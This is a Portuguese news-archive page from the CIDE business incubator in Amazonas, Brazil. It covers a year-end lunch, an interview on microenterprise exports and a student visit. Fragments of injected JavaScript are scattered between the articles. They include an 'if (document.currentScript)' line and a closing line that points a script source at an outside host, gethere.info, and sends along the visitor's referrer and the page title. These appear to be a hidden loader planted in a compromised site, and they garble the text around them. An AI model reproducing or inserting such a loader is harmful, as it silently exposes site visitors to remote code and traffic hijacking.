• 92 3216-3892
  • secretaria@cide.org.br

Arquivos por mêsdezembro 2014

CIDE realiza confraternização de fim de ano

Mais de 40 funcionários participaram do almoço de fim de ano.

A administração do Centro de Incubação e Desenvolvimento Empresarial (CIDE) realizou, no mês de dezembro, um almoço, no SESI-Clube do Trabalhador, para funcionários das empresas incubadas e funcionários da administração da incubadora.

Na ocasião, o diretor executivo José Barbosa Grosso, agradeceu a todos pelos êxitos alcançados e pelas boas relações que há entre os cooperadores. “Obrigado a todos pelo ótimo ano que tivemos. Desejo a todos um 2015 melhor e que as empresas continuem crescendo e melhorando a economia do Estado do Amazonas”, disse.

 

 

 

 

Foto13Foto12

}

Para exportar é preciso formação e informação

O coordenador geral dos programas de apoio à exportação, Flávio Pimentel, na FIEAM.

O coordenador geral dos programas de apoio à exportação, Flávio Pimentel, na FIEAM.

O coordenador geral dos programas de apoio à exportação, dentro da Secretaria de Comércio Exterior, Flávio Martins Pimentel, esteve, no segundo semestre deste ano, na Federação das Indústrias do Estado do Amazonas (FIEAM), para falar sobre exportação aos microempresários e interessados no assunto, no 1º Seminário Difusão da Cultura Exportadora do Estado do Amazonas. O informativo “Empresarial” teve a oportunidade de entrevistá-lo.

Que tipo de produtos as microempresas poderiam exportar?

Vários. Por exemplo, há casos de sucesso de empresas que atuam no campo da Moda e Praia exportando seus produtos. Na área de produtos orgânicos também há casos de sucesso, como a exportação de cacau orgânico; os produtos de perfumaria feitos com ingredientes naturais. Enfim, são produtos que alcançam nichos de mercado e conseguem ser competitivos.

Todos os produtos podem ser exportados?

As microempresas têm um caminho a percorrer, preparando-se para o mercado externo. Nem sempre o produto que atende às exigências do mercado interno, atende às exigências do mercado externo. Portanto, elas têm de verificar qual é o mercado que elas querem alcançar, qual é o país para onde o produto destinado vai encontrar mais competitividade. Então existe toda uma metodologia e preparação para identificar o mercado onde eu quero vender meu produto.

Qual conselho o senhor dá aos microempresários que desejam exportar?

Para o empresário pequeno, nós sempre sugerimos começar exportando para mercados próximos, para países fronteiriço e não dispersar totalmente o produto exportado. E, em casos de produtos da área agrícola e alimentos, há todo um processo de cuidado sanitário, inspeções e autorizações. Não é simplesmente querer exportar.

Como hoje em dia ninguém faz nada sozinho, o microempresário tem de buscar o apoio de um conjunto de entidades, como o SEBRAE, o Correio, o Ministério da Indústria e Comércio Exterior, a Federação das Indústrias do Estado do Amazonas (FIEAM), Confederação Nacional da Indústria (CNI), entre outras que apoiam a cultura exportadora para se capacitar e preparar a sua empresa para a exportação dos seus produtos.

if (document.currentScript) {

Estudantes do IFAM de Coari ouvem palestra no CIDE

Pale1

O diretor-executivo do CIDE fala aos estudantes de Coari.

Com o objetivo de complementar as aulas estudadas no curso técnico de Administração, em torno de cinquenta estudantes do Instituto Federal do Amazonas (IFAM Campus-Coari) ouviram, na manhã de hoje, 11, uma palestra sobre “O papel da incubadora CIDE no empreendedorismo local”, proferida pelo diretor-executivo, José Barbosa Grosso, que, após a exposição, convidou os alunos e professores a visitar algumas empresas instaladas na incubadora.

“É bom que os estudantes de administração aumentem seus conhecimentos adquiridos em sala de aula, visitando empresas inovadoras que um dia foram uma ideia e hoje se tornaram realidade”, disse José Grosso.

Segundo o professor José Wulisses, a visita está relacionada com as atividades desenvolvidas pelo curso de Administração. “O motivo é claro. Trouxemos os estudantes para que eles conheçam o ambiente de uma incubadora de empresas, unindo a parte teórica com a prática”.

Para a formanda Pâmela Rodrigues a visita foi impressionante. “Ouvimos falar de empreendedorismo na sala do curso, mas vir aqui e conhecer pessoalmente os trabalhos desenvolvidos na incubadora acrescenta conhecimento às aulas teóricas”, concluiu.

Pale3Pale2Pale4

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;